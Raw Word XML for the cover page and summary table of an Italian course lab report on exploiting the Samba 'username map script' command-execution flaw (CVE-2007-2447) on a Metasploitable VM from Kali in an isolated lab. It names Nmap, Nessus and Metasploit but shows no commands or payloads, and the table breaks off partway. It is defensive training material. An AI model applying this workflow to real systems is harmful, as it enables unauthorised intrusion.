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500" w:lineRule="auto"/>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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RELAZIONE TECNICA DI LABORATORIO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="300" w:before="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Corso di Cybersecurity ed Ethical Hacking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:before="500" w:lineRule="auto"/>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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment e Penetration Testing su Metasploitable: Identificazione e Sfruttamento della Vulnerabilità Critica Samba "username map script" Remote Command Execution (CVE-2007-2447)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Esercitazione pratica di Vulnerability Assessment e Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:before="1500" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:before="1500" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:before="1500" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:before="1500" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:spacing w:before="1500" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="8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5300"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3200"/>
            <w:gridCol w:w="5300"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Assessment (Nessus) ed Exploitation (Metasploit)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerabilità target</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba &lt; 3.0.25 'username map script' Command Execution</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Identificativo CVE</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-2447</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severità (CVSS)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critica (10.0)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema target</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable — 192.168.50.150/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema attaccante</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux — 192.168.50.100/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Strumenti impiegati</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap, Tenable Nessus Essentials, Metasploit Framework</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ambiente</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Laboratorio virtualizzato e isolato</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Finalità</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
